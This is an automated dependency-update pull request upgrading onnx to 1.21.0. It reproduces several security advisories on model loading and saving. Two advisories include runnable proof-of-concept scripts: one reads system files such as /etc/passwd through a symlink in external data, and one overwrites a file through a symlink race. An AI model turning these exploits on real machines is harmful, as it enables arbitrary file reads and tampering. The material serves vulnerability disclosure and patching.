Skip to content

chore(deps): update dependency onnx to v1.21.0 [security]#36

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/pypi-onnx-vulnerability
Open

chore(deps): update dependency onnx to v1.21.0 [security]#36
renovate[bot] wants to merge 1 commit intomainfrom
renovate/pypi-onnx-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate bot commented Apr 1, 2026
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
onnx 1.20.11.21.0 age confidence

GitHub Vulnerability Alerts

CVE-2026-28500

What's the issue

Passing silent=True to onnx.hub.load() kills all trust warnings and user prompts. This means a model can be downloaded from any unverified GitHub repo with zero user awareness.

if not _verify_repo_ref(repo) and not silent:
    # completely skipped when silent=True
    print("The model repo... is not trusted")
    if input().lower() != "y":
        return None

On top of that, the SHA256 integrity check is useless here — it validates against a manifest that lives in the same repo the attacker controls, so the hash will always match.

Impact

Any pipeline using hub.load() with silent=True and an external repo string is silently loading whatever the repo owner ships. If that model executes arbitrary code on load, the attacker has access to the machine.

Resolved by removing the feature

References

CVE-2026-34445

Summary

The ExternalDataInfo class in ONNX was using Python’s setattr() function to load metadata (like file paths or data lengths) directly from an ONNX model file. The problem? It didn’t check if the "keys" in the file were valid. Because it blindly trusted the file, an attacker could craft a malicious model that overwrites internal object properties.

Why its Dangerous

Instant Crash DoS: An attacker can set the length property to a massive number like 9 petabytes. When the system tries to load the model, it attempts to allocate all that RAM at once, causing the server to crash or freeze Out of Memory.

Access Bypass: By setting a negative offset -1, an attacker can trick the system into reading parts of a file it wasn't supposed to touch.

Object Corruption: Attackers can even inject "dunder" attributes like class to change the object's type entirely, which could lead to more complex exploits.

Fixed: https://github.com/onnx/onnx/pull/7751 object state corruption and DoS via ExternalDataInfo attribute injection

CVE-2026-34446

Summary

The issue is in onnx.load — the code checks for symlinks to prevent path traversal, but completely misses hardlinks, which is the problem, since a hardlink looks exactly like a regular file on the filesystem.

The Real Problem

The validator in onnx/checker.cc only calls is_symlink() and never checks the inode or st_nlink, so a hardlink walks right through every security check without any issues.

Impact

Especially dangerous in AI supply chain scenarios like HuggingFace — a single malicious model is enough to silently steal secrets from the victim's machine without them noticing anything.

CVE-2026-34447

Summary

  • Issue: Symlink traversal in external data loading allows reading files outside the model directory.
  • Affected code: onnx/onnx/checker.cc: resolve_external_data_location used via Python onnx.external_data_helper.load_external_data_for_model.
  • Impact: Arbitrary file read (confidentiality breach) when a model’s external data path resolves to a symlink targeting a file outside the model directory.

Root Cause

  • The function resolve_external_data_location(base_dir, location, tensor_name) intends to ensure that external data files reside within base_dir. It:
    • Rejects empty/absolute paths
    • Normalizes the relative path and rejects ..
    • Builds data_path = base_dir / relative_path
    • Checks exists(data_path) and is_regular_file(data_path)
  • However, std::filesystem::is_regular_file(path) follows symlinks to their targets. A symlink placed inside base_dir that points to a file outside base_dir will pass the checks and be returned. The Python loader then opens the path and reads the target file.

Code Reference

  • File: onnx/onnx/checker.cc:970-1060
  • Key logic:
    • Normalization: auto relative_path = file_path.lexically_normal().make_preferred();
    • Existence: std::filesystem::exists(data_path)
    • Regular file check: std::filesystem::is_regular_file(data_path)
    • Returned path is later opened in Python: external_data_helper.load_external_data_for_tensor.

Proof of Concept (PoC)

  • File: onnx_external_data_symlink_traversal_poc.py
  • Behavior: Creates a model with an external tensor pointing to tensor.bin. In the model directory, creates tensor.bin as a symlink to /etc/hosts (or similar). Calls load_external_data_for_model(model, base_dir). Confirms that tensor.raw_data contains content from the target outside the model directory.
  • Run:
    • python3 onnx_external_data_symlink_traversal_poc.py
    • Expected: [!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir

onnx_external_data_symlink_traversal_poc.py

#!/usr/bin/env python3
"""
ONNX External Data Symlink Traversal PoC

Finding: load_external_data_for_model() (via c_checker._resolve_external_data_location)
does not reject symlinks. A relative location that is a symlink inside the
model directory can target a file outside the directory and will be read.

Impact: Arbitrary file read outside model_dir when external data files are
obtained from attacker-controlled archives (zip/tar) that create symlinks.

This PoC:
 - Creates a model with a tensor using external_data location 'tensor.bin'
 - Creates 'tensor.bin' as a symlink to a system file (e.g., /etc/hosts)
 - Calls load_external_data_for_model(model, base_dir)
 - Confirms that tensor.raw_data contains the content of the outside file

Safe: only reads a benign system file if present.
"""

import os
import sys
import tempfile
import pathlib

# Ensure we import installed onnx, not the local cloned package
_here = os.path.dirname(os.path.abspath(__file__))
if _here in sys.path:
    sys.path.remove(_here)

import onnx
from onnx import helper, TensorProto
from onnx.external_data_helper import (
    set_external_data,
    load_external_data_for_model,
)

def pick_target_file():
    candidates = ["/etc/hosts", "/etc/passwd", "/System/Library/CoreServices/SystemVersion.plist"]
    for p in candidates:
        if os.path.exists(p) and os.path.isfile(p):
            return p
    raise RuntimeError("No suitable readable system file found for this PoC")

def build_model_with_external(location: str):
    # A 1D tensor; data will be filled from external file
    tensor = helper.make_tensor(
        name="X_ext",
        data_type=TensorProto.UINT8,
        dims=[0],  # dims will be inferred after raw_data is read
        vals=[],
    )
    # add dummy raw_data then set_external_data to mark as external
    tensor.raw_data = b"dummy"
    set_external_data(tensor, location=location)

    # Minimal graph that just feeds the initializer as Constant
    const_node = helper.make_node("Constant", inputs=[], outputs=["out"], value=tensor)
    graph = helper.make_graph([const_node], "g", inputs=[], outputs=[helper.make_tensor_value_info("out", TensorProto.UINT8, None)])
    model = helper.make_model(graph)
    return model

def main():
    base = tempfile.mkdtemp(prefix="onnx_symlink_poc_")
    model_dir = base
    link_name = os.path.join(model_dir, "tensor.bin")

    target = pick_target_file()
    print(f"[*] Using target file: {target}")

    # Create symlink in model_dir pointing outside
    try:
        pathlib.Path(link_name).symlink_to(target)
    except OSError as e:
        print(f"[!] Failed to create symlink: {e}")
        print("    This PoC needs symlink capability.")
        return 1

    # Build model referencing the relative location 'tensor.bin'
    model = build_model_with_external(location="tensor.bin")

    # Use in-memory model; explicitly load external data from base_dir
    loaded = model
    print("[*] Loading external data into in-memory model...")
    try:
        load_external_data_for_model(loaded, base_dir=model_dir)
    except Exception as e:
        print(f"[!] load_external_data_for_model raised: {e}")
        return 1

    # Validate that raw_data came from outside file by checking a prefix
    raw = None
    # Search initializers
    for t in loaded.graph.initializer:
        if t.name == "X_ext" and t.HasField("raw_data"):
            raw = t.raw_data
            break
    # Search constant attributes if not found
    if raw is None:
        for node in loaded.graph.node:
            for attr in node.attribute:
                if attr.HasField("t") and attr.t.name == "X_ext" and attr.t.HasField("raw_data"):
                    raw = attr.t.raw_data
                    break
            if raw is not None:
                break
    if raw is None:
        print("[?] Did not find raw_data on tensor; PoC inconclusive")
        return 2

    with open(target, "rb") as f:
        target_prefix = f.read(32)
    if raw.startswith(target_prefix):
        print("[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir")
        print(f"      Symlink {link_name} -> {target}")
        return 0
    else:
        print("[?] Raw data did not match target prefix; environment-specific behavior")
        return 3

if __name__ == "__main__":
    sys.exit(main())

GHSA-q56x-g2fj-4rj6

Summary

The save_external_data method seems to include multiple issues introducing a local TOCTOU vulnerability, an arbitrary file read/write on any system. It potentially includes a path validation bypass on Windows systems.
Regarding the TOCTOU, an attacker seems to be able to overwrite victim's files via symlink following under the same privilege scope.
The mentioned function can be found here: https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L188

Details

TOCTOU

The vulnerable code pattern:

   # CHECK - Is this a file?
   if not os.path.isfile(external_data_file_path):
       # Line 228-229: USE #​1 - Create if it doesn't exist
       with open(external_data_file_path, "ab"):
           pass
   
   # Open for writing
   with open(external_data_file_path, "r+b") as data_file:
       # Lines 233-243: Write tensor data
       data_file.seek(0, 2)
       if info.offset is not None:
           file_size = data_file.tell()
           if info.offset > file_size:
               data_file.write(b"\0" * (info.offset - file_size))
           data_file.seek(info.offset)
       offset = data_file.tell()
       data_file.write(tensor.raw_data)

There is a time gap between os.path.isfile and open with no atomic file creation flags (e.g. O_EXCEL | O_CREAT) allowing the attacker to create a symlink that is being followed (absence of O_NOFOLLOW), between these two calls. By combining these, the attack is possible as shown below in the PoC section.

Bypass

There is also a potential validation bypass on Windows systems in the same method (https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L203) alloing absolute paths like C:\ (only 1 part):

if location_path.is_absolute() and len(location_path.parts) > 1

This may allow Windows Path Traversals (not 100% verified as I am emulating things on a Debian distro).

PoC

Install the dependencies and run this:

mport os
import sys
import tempfile
import numpy as np
import onnx
from onnx import TensorProto, helper
from onnx.numpy_helper import from_array

# Create a temporary directory for our poc
with tempfile.TemporaryDirectory() as tmpdir:
    print(f"[*] Working directory: {tmpdir}")

    # Create a "sensitive" file that we'll overwrite
    sensitive_file = os.path.join(tmpdir, "sensitive.txt")
    with open(sensitive_file, 'w') as f:
        f.write("SENSITIVE DATA - DO NOT OVERWRITE")

    original_content = open(sensitive_file, 'rb').read()
    print(f"[*] Created sensitive file: {sensitive_file}")
    print(f"    Original content: {original_content}")

    # Create a simple ONNX model with a large tensor
    print("[*] Creating ONNX model with external data...")

    # Create a tensor with data > 1KB (to trigger external data)
    large_array = np.ones((100, 100), dtype=np.float32)  # 40KB tensor
    large_tensor = from_array(large_array, name='large_weight')

    # Create a minimal model
    model = helper.make_model(
        helper.make_graph(
            [helper.make_node('Identity', ['input'], ['output'])],
            'minimal_model',
            [helper.make_tensor_value_info('input', TensorProto.FLOAT, [100, 100])],
            [helper.make_tensor_value_info('output', TensorProto.FLOAT, [100, 100])],
            [large_tensor]
        )
    )

    # Save model with external data to create the external data file
    model_path = os.path.join(tmpdir, "model.onnx")
    external_data_name = "data.bin"
    external_data_path = os.path.join(tmpdir, external_data_name)

    onnx.save_model(
        model, 
        model_path,
        save_as_external_data=True,
        all_tensors_to_one_file=True,
        location=external_data_name,
        size_threshold=1024
    )

    print(f"[+] Model saved: {model_path}")
    print(f"[+] External data created: {external_data_path}")

    # Now comes the attack: replace the external data file with a symlink
    print("[!] ATTACK: Replacing external data file with symlink...")

    # Remove the legitimate external data file
    if os.path.exists(external_data_path):
        os.remove(external_data_path)
        print(f"    Removed: {external_data_path}")

    # Create symlink pointing to sensitive file
    os.symlink(sensitive_file, external_data_path)
    print(f"    Created symlink: {external_data_path} -> {sensitive_file}")

    # Now load and re-save the model, which will trigger the vulnerability
    print("Loading model and saving with external data...")
    try:
        # Load the model (without loading external data)
        loaded_model = onnx.load(model_path, load_external_data=False)

        # Modify the model slightly (to ensure we write new data)
        loaded_model.graph.initializer[0].raw_data = large_array.tobytes()

        # Save again - this will call save_external_data() and follow the symlink
        onnx.save_model(
            loaded_model,
            model_path,
            save_as_external_data=True,
            all_tensors_to_one_file=True,
            location=external_data_name,
            size_threshold=1024
        )
    except Exception as e:
        print(f"[-] Error: {e}")
    
    # Check if the sensitive file was overwritten
    print("[*] Checking if sensitive file was modified...")
    modified_content = open(sensitive_file, 'rb').read()
    
    print(f"    Original size: {len(original_content)} bytes")
    print(f"    Current size:  {len(modified_content)} bytes")
    print(f"    Original content: {original_content[:50]}")
    print(f"    Current content:  {modified_content[:50]}...")
    print()
    
    if modified_content != original_content:
        print("[!] Success!")
    else:
        print("[-] Failure")

Output:

[*] Working directory: /tmp/tmpqy7z88_l
[*] Created sensitive file: /tmp/tmpqy7z88_l/sensitive.txt
    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'

[*] Creating ONNX model with external data...
[+] Model saved: /tmp/tmpqy7z88_l/model.onnx
[+] External data created: /tmp/tmpqy7z88_l/data.bin
[!] ATTACK: Replacing external data file with symlink...
    Removed: /tmp/tmpqy7z88_l/data.bin
    Created symlink: /tmp/tmpqy7z88_l/data.bin -> /tmp/tmpqy7z88_l/sensitive.txt
Loading model and saving with external data...
[*] Checking if sensitive file was modified...
    Original size: 33 bytes
    Current size:  40033 bytes
    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'
    Current content:  b'SENSITIVE DATA - DO NOT OVERWRITE\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00'...

Successfully overwritting the "sensitive data" file.

Impact

The impact may include filesystem injections (e.g. on ssh keys, shell configs, crons) or destruction of files, affecting integrity and availability.

Mitigations

  1. Atomic file creation
  2. Symlink protection
  3. Path canonicalization

Release Notes

onnx/onnx (onnx)

v1.21.0

Compare Source

ONNX v1.21.0 is now available with exciting new features! We would like to thank everyone who contributed to this release!
Please visit onnx.ai to learn more about ONNX and associated projects.

What's Changed

Breaking Changes and Deprecations
Spec and Operator
Reference Implementation
Utilities and Tools
Build, CI and Tests
Documentation
Other Changes

New Contributors

Full Changelog: onnx/onnx@v1.20.1...v1.21.0

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

@type/dependency

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants